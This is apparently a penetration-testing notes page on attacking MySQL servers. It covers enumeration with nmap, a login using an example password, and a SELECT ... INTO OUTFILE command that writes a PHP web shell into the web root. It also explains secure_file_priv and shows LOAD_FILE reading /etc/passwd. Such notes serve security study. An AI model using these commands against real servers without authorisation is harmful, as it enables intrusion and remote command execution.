🐬MySQL

Default system schemas/databases

  • mysql - is the system database that contains tables that store information required by the MySQL server

  • information_schema - provides access to database metadata

  • performance_schema - is a feature for monitoring MySQL Server execution at a low level

  • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

Enumeration

Basic Nmap scan to grab the banner of the SQL server

  • 3306 - MySQL

nmap -Pn -sVC -p 3306 IP

Misconfigurations

This can allow access to the service without credentials if anonymous access is enabled.

Other common problems are on how privileges are set, as we may be able to perform actions such as:

  • Read or change the contents of the DB

  • Read or change server configuration

  • Execute commands

  • Read local files

  • Capture the local system hash

Reading the Database

MySQL

mysql -u user -pPasword1 -h 10.129.20.13
SHOW DATABASES;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| users              |
+--------------------+
2 rows in set (0.00 sec)

Command Execution

If we have appropriate privileges we can use the SQL database to execute system commands

Write Local Files

We can achieve command execution if we write to a location in the file system that can successfully execute our commands.

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

A global system variable secure_file_priv limits the effect of data and export operations such as

  • LOAD_DATA

  • SELECT ... INTO OUTFILE.

We can now try to visit the URL to use our uploaded file

http:\\IP\webshell.php

secure_file_priv can be:

  • Empty, no privileges apply

  • Set to the name of a directory, the server limits import and export functions

  • Set to NULL, the server disabled the use of import and export functions

We can check to see if the variable is set

show variables like "secure_file_priv";

Read Local Files

Not enabled by default, but if the right permissions are set we will be able to read files with this

select LOAD_FILE("/etc/passwd");
PreviousAttacking Common ServicesNextMSSQL

Last updated

Was this helpful?